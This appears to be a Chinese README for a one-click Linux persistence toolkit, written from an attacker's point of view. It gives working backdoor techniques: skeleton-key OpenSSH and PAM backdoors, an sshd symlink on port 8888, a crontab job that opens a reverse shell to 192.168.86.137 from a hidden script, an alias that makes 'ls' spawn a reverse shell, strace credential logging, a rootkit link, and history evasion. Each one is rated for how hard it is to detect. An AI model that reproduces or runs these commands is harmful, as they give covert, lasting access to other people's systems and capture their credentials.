Linux权限维持一键工具

python3运行此项目[我自己的环境是Python 3.9.7]，但是运行权限维持模块脚本请看上面的表格安装依赖pip install -r requirements.txt

快速判断目标机器适合的权限维持模块，运行 /check/ 目录下的check.py文件[这个不需要任何依赖环境，python3和python2都支持]python check.pypython3 check.pypython2 check.py

OpenSSH后门万能密码&记录密码（这个需要依赖环境），就是把对方的门换个锁，但是原来的钥匙也可以使用发现程度：||
PAM后门，PAM是一个Linux登录验证的认证服务，修改其中关于ssh登录的验证，添加一个万能密码，已经记录的账号密码位置（类似把对方房间内有内鬼）发现程度：||

SSH软链接cat /etc/ssh/sshd_config|grep UsePAMln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888ssh [email protected] -p 8888 任意密码登录即可发现程度：||||||

公私钥使用密钥进行登录发现程度：||||||

后门帐号使用命令添加账号发现程度：||||||

crontab后计划任务1、编辑后门反弹vim /etc/.111.sh
#!/bin/bashsh -i >& /dev/tcp/192.168.86.137/3434 0>&1
chmod +x /etc/.111.sh
2、添加定时任务vim /etc/crontab*/1 * * * * root /etc/.1111.sh发现程度：||||||

Strace后门strace是一个动态跟踪工具，它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门，来扩大我们的信息收集范围可以记录ssh明文和密钥（登录的）和Rootkit配合一起发现程度：||||
命令自定义-Alias后门alias命令的功能：为命令设置别名alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'执行ls就会反弹shell持久化+隐藏：重启依旧生效发现程度：||||
Rootkit后门https://github.com/f0rb1dd3n/Reptile/releases/Rootkit是一种特殊的恶意软件，它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息，比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。发现程度：||但是使用工具进行检测出来情况很大，建议看代码，手动编写此工具（难度很大）

history不记录执行命令在输入命令时候，添加空格
ssh软链接&crontab快速生成软链接[需要运行脚本成功后，一分钟连接]，并且执行计划任务，每分钟判断当前软链接是否存在，如果被kill掉，就重新执行
|||||  越多，越容易发发现||        越少，越难发现，但是部署起来，需要的依赖很多